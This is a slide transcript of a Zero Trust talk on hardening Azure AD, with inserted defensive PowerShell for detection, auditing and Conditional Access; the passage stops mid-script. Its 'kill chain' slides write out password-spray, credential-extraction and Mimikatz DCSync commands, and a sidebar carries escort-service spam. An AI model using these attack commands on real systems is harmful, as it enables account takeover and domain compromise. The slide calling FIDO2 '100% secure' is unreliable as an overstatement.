Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptx
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active Directory
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger !
 
CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?CIEM, tiens une nouvelle catégorie de produits identité?
CIEM, tiens une nouvelle catégorie de produits identité?
 
Mise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement HybrideMise en oeuvre du passwordless AD dans un environnement Hybride
Mise en oeuvre du passwordless AD dans un environnement Hybride
 
La politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAPLa politique de mots de passe : de la théorie à la pratique avec OpenLDAP
La politique de mots de passe : de la théorie à la pratique avec OpenLDAP
 

Recently uploaded

Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 

Recently uploaded (20)

Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 

Apply the Zero Trust model for hardening your Azure AD! (slide transcript)

  • 1. Thank you to all our partners! 27 October 2022 - PARIS @IdentityDays #identitydays2022
  • 2. Apply the Zero Trust model for Hardening your Azure AD
    Jean-François Apréa: CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist | MVP Security | MVP Cloud and Datacenter Management (16) | Author | Speaker | Trainer (MCT Alumni)
    Seyfallah Tagrerout: CEO and Founder STC Consulting | Cloud and Security Architect | Microsoft Azure Specialist | Microsoft Zero Trust Specialist | MVP Azure and Enterprise Mobility (8) | Author | Speaker | Trainer
  • 3. Identity Days 2022 - Agenda
    Zero Trust? It's urgent to go, because it's urgent to be really protected!
    • Azure AD & Microsoft Entra
    • Zero Trust and Microsoft vision
    • Azure AD is Identity and Access Control centric
    • Azure AD Kill Chain
    • Azure AD Hardening with Zero Trust in mind 😊
    • Good practices and 12-step action plan
  • 4. It becomes difficult to be up-to-date … Hackers don't give a shit! (Source: Jean-Charles Duret-Ferrari)
     About your project's scope…
     It's managed by a third party…
     It's a legacy system…
     It's too critical to patch…
     You've always done it that way…
     About your Go-Live date…
     It's only a Pilot/POC, not production…
     About NDA…
     It was not a mandatory requirement…
     It is a non-exposed internal system…
     It is hard to change…
     It is handled in the Cloud…
     The vendor does not support this…
     It is an interim solution…
     It is encrypted on disk…
     You cannot explain the risk to the business…
     You have other priorities…
     You don't have a business justification…
     You cannot have ROI…
     You contracted out that risk…
    Really, too many bad reasons!
  • 5. Azure AD & Microsoft Entra
  • 6. Azure Active Directory & Microsoft Entra
    Azure Active Directory:
     Identity & Access Management
     Inter-connected ecosystem
     Security
     Hybrid Cloud
     Several types of identities
    Microsoft Entra:
    • Azure Active Directory
    • Microsoft Entra Permissions Management
    • Microsoft Entra Verified ID
    • Microsoft Entra Workload Identities
    • Microsoft Entra Identity Governance
  • 8. About Zero Trust and the Microsoft vision
  • 9. Microsoft Zero Trust vision: Verify explicitly / Use least privileged access / Assume breach
  • 10. Microsoft Zero Trust vision
    Assume breach: assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly. This transforms overall thinking, strategy and architectures from "safe network" to "open network". Asset/Node = user, app, device, data, API, etc.
    Verify explicitly: protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry. This reduces the "attack surface" of each asset.
    Use least privilege access: limit the access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk-based policies like adaptive access control. This reduces the blast radius of a compromise.
  • 11. Azure AD is Identity and Access Control centric
  • 12. Azure AD Access Control plane: verification of each access attempt; access control to apps and data; Azure AD signals. Never trust, always verify…
  • 13. Azure AD Access Control
  • 14. Azure AD Kill Chain ✨😯
  • 15. Azure AD Kill Chain: how to get started 😊
  • 16. Azure AD Kill Chain: step-by-step progression 😯
    1. Azure AD non-authenticated discovery
    2. Search for a valid e-mail account
    3. Password spraying attack
    4. Change to a user-authenticated session
    5. Accounts: list synchronized and cloud accounts
    6. Azure AD Connect: find Sync_Sync01_guid@domain.onmicrosoft.com and the AAD Connect VM name in the MSOL account
    7. Now, by default, all is possible!
    8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of the MSOL account passwords via the AAD Connect SQL database or directly from LSASS.exe using the Mimikatz tool!
    9. By now it is possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯
    10. And finally, via Active Directory, exploit the AAD SSO features by recovering the password of AZUREADSSOACC$. Otherwise, at this point, it is possible to access the Azure portal without providing a password.
    So, the Azure AD Connect VM must be super secure.
  • 17. Azure AD Kill Chain: tenant discovery 😯
    https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME@DOMAIN]&xml=1
    😯 First info available anonymously, without authentication 😯
    About your tenant:  Active or not?  Name?  Federated or not?
  • 18. Azure AD Kill Chain: tenant discovery 😯
    Discovery and recon of an Azure tenant. Free PowerShell module to install: GitHub - Gerenios/AADInternals: AADInternals PowerShell module for administering Azure AD and Office 365
     Get tenant name, branding and DNS name: Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com
     Get tenant ID: Get-AADIntTenantID -Domain testtenant.onmicrosoft.com
     Get all additional domains added: Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com
     Get tenant general info: Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com
    😯 Third-party PowerShell modules to find more... 😯
  • 19. Azure AD Kill Chain: initial access + password spray / brute force 😯
    MSOLSpray tool: https://github.com/dafthack/MSOLSpray
    Import-Module MSOLSpray.ps1
    Invoke-MSOLSpray -UserList .\userlist.txt -Password IdentityDays$Paris%2022
    Basic sample password files are available here: https://github.com/ohmybahgosh/RockYou2021.txt
  • 20. Azure AD Kill Chain: MFA attack + MFA fatigue 😯
    Phishing & man in the middle: https://github.com/kgretzky/evilginx
    27/09/2022: MFA fatigue leads to breach of Uber's corporate users: https://veruscorp.com/mfa-fatigue-leads-to-breach-of-ubers-corporate-systems/
    Using FIDO2 hardware keys like YubiKey provides 100% secure MFA
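The two attack patterns on slides 19 and 20 leave a recognisable trace in the Azure AD sign-in logs, which is where a defender catches them. The script below is an added example, not code from the deck or its authors: it runs two detections over a constructed set of sign-in records shaped like the Microsoft Graph signIn resource (createdDateTime, userPrincipalName, ipAddress, status.errorCode). The user names, IP addresses and timestamps are invented sample data; the error codes are the documented Azure AD values (50126 = invalid user name or password, 500121 = strong authentication request failed or denied). In production you would feed exported sign-in logs from Log Analytics / Sentinel into the same two functions.

```powershell
# Added example (not from the Identity Days deck): offline detection of password
# spray and MFA fatigue over Azure AD sign-in records. The records below are a
# constructed sample; in production, pipe exported sign-in logs into the functions.
# Error codes used: 50126 = invalid username or password,
#                   500121 = strong authentication (MFA) request failed or denied.

$sampleSignIns = @'
[
 {"createdDateTime":"2022-10-27T08:00:01Z","userPrincipalName":"alice@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":50126}},
 {"createdDateTime":"2022-10-27T08:00:09Z","userPrincipalName":"bob@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":50126}},
 {"createdDateTime":"2022-10-27T08:00:20Z","userPrincipalName":"carol@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":50126}},
 {"createdDateTime":"2022-10-27T08:00:31Z","userPrincipalName":"dave@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":50126}},
 {"createdDateTime":"2022-10-27T08:00:45Z","userPrincipalName":"erin@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":50126}},
 {"createdDateTime":"2022-10-27T08:01:02Z","userPrincipalName":"frank@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":0}},
 {"createdDateTime":"2022-10-27T09:15:00Z","userPrincipalName":"alice@contoso.example","ipAddress":"198.51.100.7","status":{"errorCode":50126}},
 {"createdDateTime":"2022-10-27T22:10:00Z","userPrincipalName":"frank@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":500121}},
 {"createdDateTime":"2022-10-27T22:10:40Z","userPrincipalName":"frank@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":500121}},
 {"createdDateTime":"2022-10-27T22:11:15Z","userPrincipalName":"frank@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":500121}},
 {"createdDateTime":"2022-10-27T22:12:05Z","userPrincipalName":"frank@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":500121}},
 {"createdDateTime":"2022-10-27T22:13:30Z","userPrincipalName":"frank@contoso.example","ipAddress":"203.0.113.10","status":{"errorCode":500121}}
]
'@ | ConvertFrom-Json

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] [object[]] $SignIns,
        [int] $MinDistinctUsers = 5,
        [int] $WindowMinutes    = 30
    )
    # Spray signature: one source IP, many distinct accounts, each failing with a
    # bad password (50126) inside a short window. A later success from the same IP
    # names the account whose password was guessed and must be reset first.
    $failures = $SignIns | Where-Object { $_.status.errorCode -eq 50126 }
    foreach ($group in ($failures | Group-Object ipAddress)) {
        $events = @($group.Group | Sort-Object { [datetime]$_.createdDateTime })
        $first  = [datetime]$events[0].createdDateTime
        $last   = [datetime]$events[-1].createdDateTime
        $users  = @($events.userPrincipalName | Select-Object -Unique)
        if ($users.Count -ge $MinDistinctUsers -and ($last - $first).TotalMinutes -le $WindowMinutes) {
            $hits = @($SignIns | Where-Object { $_.ipAddress -eq $group.Name -and $_.status.errorCode -eq 0 })
            [pscustomobject]@{
                Pattern               = 'PasswordSpray'
                Source                = $group.Name
                DistinctUsers         = $users.Count
                FailedAttempts        = $events.Count
                Window                = "$first .. $last"
                CompromisedCandidates = (@($hits.userPrincipalName | Select-Object -Unique) -join ', ')
            }
        }
    }
}

function Find-MfaFatigue {
    param(
        [Parameter(Mandatory)] [object[]] $SignIns,
        [int] $MinPrompts    = 5,
        [int] $WindowMinutes = 15
    )
    # Fatigue signature: one account, a burst of strong-auth failures/denials
    # (500121): someone holding the password keeps triggering pushes until the
    # user gives in. Respond by resetting the password and revoking sessions.
    $denied = $SignIns | Where-Object { $_.status.errorCode -eq 500121 }
    foreach ($group in ($denied | Group-Object userPrincipalName)) {
        $events = @($group.Group | Sort-Object { [datetime]$_.createdDateTime })
        $first  = [datetime]$events[0].createdDateTime
        $last   = [datetime]$events[-1].createdDateTime
        if ($events.Count -ge $MinPrompts -and ($last - $first).TotalMinutes -le $WindowMinutes) {
            [pscustomobject]@{
                Pattern    = 'MfaFatigue'
                Account    = $group.Name
                Prompts    = $events.Count
                Window     = "$first .. $last"
                SourceIPs  = (@($events.ipAddress | Select-Object -Unique) -join ', ')
            }
        }
    }
}

Find-PasswordSpray -SignIns $sampleSignIns | Format-List
Find-MfaFatigue    -SignIns $sampleSignIns | Format-List
```

On the sample data the first function reports one spray source (203.0.113.10, five accounts in under a minute) and names frank@contoso.example as the account that later signed in successfully from it; the second reports the five MFA denials against that same account in the evening. The single bad password from 198.51.100.7 stays below the threshold, which is the point of counting distinct users rather than raw failures.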
  • 21. Azure AD Kill Chain: enumeration 😯
    AzureAD PowerShell module (PowerShell Gallery | AzureAD 2.0.2.140): Install-Module -Name AzureAD
    With a standard user, but without special privileges! Connect-AzureAD
     Session state and details: Get-AzureADCurrentSessionInfo
     Tenant details: Get-AzureADTenantDetail
     List all AAD users: Get-AzureADUser -All $true
     Get specific user properties: Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com
     Get user names containing the "admin" string: Get-AzureADUser -SearchString "admin"
     Get all groups containing the "admin" string: Get-AzureADGroup -All $true | ?{$_.DisplayName -match "admin"}
     Get all groups synchronized from AD to AAD: Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
     Get all cloud-only Azure AD groups: Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
     Get all users with the Global Administrator role: Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
     Get all compliant (Intune-managed) devices: Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
     Get all registered apps: Get-AzureADApplication -All $true
    Other useful tools:  via the Azure portal  via PowerShell  via Azure CLI
    Warning: by default, an AAD user can 😯
     Access the list of all users, groups, applications, devices, roles, subscriptions
     Send invitations to Guest type accounts
     Create security groups
     Read group members
     Create a new app
     Add up to 50 Azure AD devices
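The "by default, an AAD user can…" warning on slide 21 maps onto the tenant's authorization policy, which is where several of those defaults are tightened. The script below is an added example, not code from the deck or its authors: it reads the policy with the AzureAD module cmdlets Get-AzureADMSAuthorizationPolicy / Set-AzureADMSAuthorizationPolicy, reports each risky default against a recommended value, and only changes anything when run with the `-Remediate` switch. It assumes an existing Connect-AzureAD session as Global Administrator; the device-join quota from the slide lives in the separate device settings and is not covered here.

```powershell
# Added example (not from the Identity Days deck): audit, and optionally tighten,
# the default user permissions that slide 21 shows an unprivileged user abusing.
# Assumes: AzureAD module loaded, Connect-AzureAD already done as Global Admin.
# Usage: .\Audit-DefaultUserPermissions.ps1            (report only; file name is hypothetical)
#        .\Audit-DefaultUserPermissions.ps1 -Remediate (apply the recommended values)
param([switch] $Remediate)

$policy = Get-AzureADMSAuthorizationPolicy
$perms  = $policy.DefaultUserRolePermissions

# Each row: the setting, its current value, the value we want, and why it matters.
$findings = @(
    [pscustomobject]@{ Setting = 'AllowedToCreateApps';           Current = $perms.AllowedToCreateApps
                       Recommended = $false;  Why = 'any member can register apps (consent / OAuth abuse surface)' }
    [pscustomobject]@{ Setting = 'AllowedToCreateSecurityGroups'; Current = $perms.AllowedToCreateSecurityGroups
                       Recommended = $false;  Why = 'any member can create security groups' }
    [pscustomobject]@{ Setting = 'AllowInvitesFrom';              Current = $policy.AllowInvitesFrom
                       Recommended = 'adminsAndGuestInviters'; Why = 'any member can invite guests' }
    [pscustomobject]@{ Setting = 'BlockMsolPowerShell';           Current = $policy.BlockMsolPowerShell
                       Recommended = $true;   Why = 'non-admins can enumerate through the legacy MSOnline PowerShell endpoint' }
)

# AllowedToReadOtherUsers is reported but never changed here: turning it off breaks
# people pickers and many apps, so it is a conscious decision, not a quick win.
$findings += [pscustomobject]@{ Setting = 'AllowedToReadOtherUsers'; Current = $perms.AllowedToReadOtherUsers
                                Recommended = '(review)'; Why = 'any member can read the whole directory' }

$findings | Select-Object Setting, Current, Recommended, Why | Format-Table -AutoSize

if ($Remediate) {
    Set-AzureADMSAuthorizationPolicy `
        -DefaultUserRolePermissions @{ AllowedToCreateApps = $false; AllowedToCreateSecurityGroups = $false } `
        -AllowInvitesFrom 'adminsAndGuestInviters' `
        -BlockMsolPowerShell $true
    Write-Host 'Default user permissions tightened; re-run without -Remediate to confirm.'
}
```

Run it in report mode first: the table shows which of the slide's "by default" capabilities are still open in your tenant. Application registration and group creation can be re-granted to specific people through the Application Developer role and group-creation settings, so closing the defaults does not block legitimate work.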
  • 22. Azure AD Kill Chain: and finally, use of MSOL_* credentials 😯
    Enumeration via the AD PowerShell module: Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
    Enumeration via the Azure AD PowerShell module: Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
    Once the AAD Connect server has been analyzed, the credentials are extracted: Get-AADIntSyncCredentials
    The end: MSOL_* account credential + DCSync attack with Mimikatz
    runas /netonly /user:amslab.corp\MSOL_782bef6aa0a9 cmd
    Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLab\krbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
• 23. Azure AD Hardening ✨👍
• 24. Azure AD Hardening
Inspired by Microsoft Entra
Based on customer experience:
 Security projects
 Assessment / audit missions
 Emergency operations
 Remediation
• 25. Azure AD Hardening: always start with the Azure AD quick wins 👍
Based on customer experience:
 Security projects
 Assessment / audit missions
 Emergency operations
 Remediation
• 26. Azure AD Hardening: always start with the Azure AD quick wins 👍
• 27. Azure AD Hardening, Part 1: Enforce your secrets
• 28. Azure AD Hardening, Part 1: Enforce your secrets
1. Use Microsoft Secure Score
 Deploy MFA for EVERYONE
 Enable Identity Protection (Azure AD P2)
2. Use Azure AD Smart Lockout
 For Azure AD cloud accounts
 For hybrid accounts
3. Deploy passwordless authentication
 FIDO2 security keys
 Microsoft Authenticator
4. Create TWO emergency-access (break-glass) accounts
 Cloud-only, in Azure AD
 Do not synchronize them
 Do not use MFA
 Do not use FIDO2 keys
 Disable password expiration
 Activate a strong audit on these two accounts with:
  Azure Log Analytics
  Azure Sentinel
  Cloud App Security (MCAS)
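What the "strong audit" of the two break-glass accounts looks like in practice: a query against the Log Analytics workspace that receives the Azure AD sign-in logs (SigninLogs table, which requires the Azure AD diagnostic setting to already forward sign-in logs), alerting on any sign-in attempt of those accounts, successful or not, because they are only ever used in a real emergency. This is an added example, not from the deck; it needs the Az.Accounts and Az.OperationalInsights modules and a Connect-AzAccount session, and the workspace ID and UPNs are assumptions to replace. The same KQL can be pasted as a scheduled analytics rule in Azure Sentinel, which is the KQL hunting the SecOps part of this deck calls for.

```powershell
# Added example: detect any sign-in activity of the emergency-access accounts.
# Assumes Connect-AzAccount has been run; workspace ID and UPNs are placeholders.
$workspaceId    = '00000000-0000-0000-0000-000000000000'                                   # assumed
$breakGlassUpns = @('bg-01@contoso.onmicrosoft.com', 'bg-02@contoso.onmicrosoft.com')       # assumed

# KQL: every sign-in attempt (ResultType 0 = success) of the break-glass accounts in the last 24 hours
$upnList = ($breakGlassUpns | ForEach-Object { "'$_'" }) -join ', '
$kql = @"
SigninLogs
| where TimeGenerated > ago(24h)
| where UserPrincipalName in~ ($upnList)
| project TimeGenerated, UserPrincipalName, ResultType, ResultDescription, IPAddress,
          Location, AppDisplayName, AuthenticationRequirement, ConditionalAccessStatus
| order by TimeGenerated desc
"@

$result = Invoke-AzOperationalInsightsQuery -WorkspaceId $workspaceId -Query $kql
$rows   = @($result.Results)

if ($rows.Count -eq 0) {
    "OK: no break-glass sign-in activity in the last 24 hours"
} else {
    # Any hit must match an open incident or change record; otherwise treat it as a compromise
    "ALERT: $($rows.Count) break-glass sign-in event(s) in the last 24 hours"
    $rows | Format-Table TimeGenerated, UserPrincipalName, ResultType, IPAddress, Location, AppDisplayName -AutoSize
}
```

Run it on a schedule (or as a Sentinel rule with the same query) and route the alert to a channel that is independent of the tenant itself, since a break-glass sign-in usually means the normal admin path is already unavailable or compromised.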
• 29. Azure AD Hardening, Part 1: Hardening Azure MFA
1. MFA protection
2. Authentication strengths
3. MFA fraud alert
4. Identity Protection
• 30. Azure AD Hardening, Part 2: Conditional Access design
Scope the audiences:
 Regular users
 High-privilege users
 Guest / external users
 Workload identities
Logical separation of the policies in AAD gives:
 Flexibility
 Granularity
 Lower risk of error
 More readability
 Easier troubleshooting
 Governance
• 31. Azure AD Hardening, Part 2: Conditional Access design, best practices
 Always test the behaviour first: What If? and report-only mode
Authentication policies
 Enforce MFA for all administrators
 Enforce MFA for all standard users
 Enforce MFA for all guest users
 Block legacy authentication
 Reduce the attack surface
Device access policies
 Block unsupported device platforms
 Require managed devices (Endpoint Manager) for admin stations
 Require an approved app for mobile access (MAM)
 Require managed devices
 Specific Conditional Access policy for macOS (if needed)
Strict security policies
 Block MFA registration from untrusted locations
 Require Terms of Use for all administrators / guest access / consultants
 Control sign-in frequency
 Disable persistent browser sessions
 Block foreign locations
 Require a trusted location for all admins
 User-risk and sign-in-risk based policies (via Identity Protection)
 Authentication context: PIM / MIP-labelled SharePoint sites / Defender for Cloud Apps upload and download
 Privileged access via device filters
 Conditional Access for workload identities
 Block all cloud apps except Teams / SPO for guest access
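Two of the policies above ("Block legacy authentication" and "Enforce MFA for all administrators"), created with the Microsoft Graph PowerShell SDK in report-only mode so their effect can be checked in the sign-in logs before they are enforced, with the break-glass accounts excluded. This is an added example, not from the deck: it assumes the Microsoft.Graph module, a session with the Policy.ReadWrite.ConditionalAccess scope, and the two emergency-account object IDs in $breakGlassIds (placeholders). The role template IDs are Microsoft's built-in directory role template IDs.

```powershell
# Added example: create two Conditional Access policies in report-only mode.
Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess'

$breakGlassIds = @('<objectId of bg-01>', '<objectId of bg-02>')   # assumed: always excluded

# 1. Block legacy authentication (Exchange ActiveSync and "other" clients cannot do MFA)
$blockLegacy = @{
    displayName = 'CA001 - Block legacy authentication'
    state       = 'enabledForReportingButNotEnforced'   # report-only first
    conditions  = @{
        users          = @{ includeUsers = @('All'); excludeUsers = $breakGlassIds }
        applications   = @{ includeApplications = @('All') }
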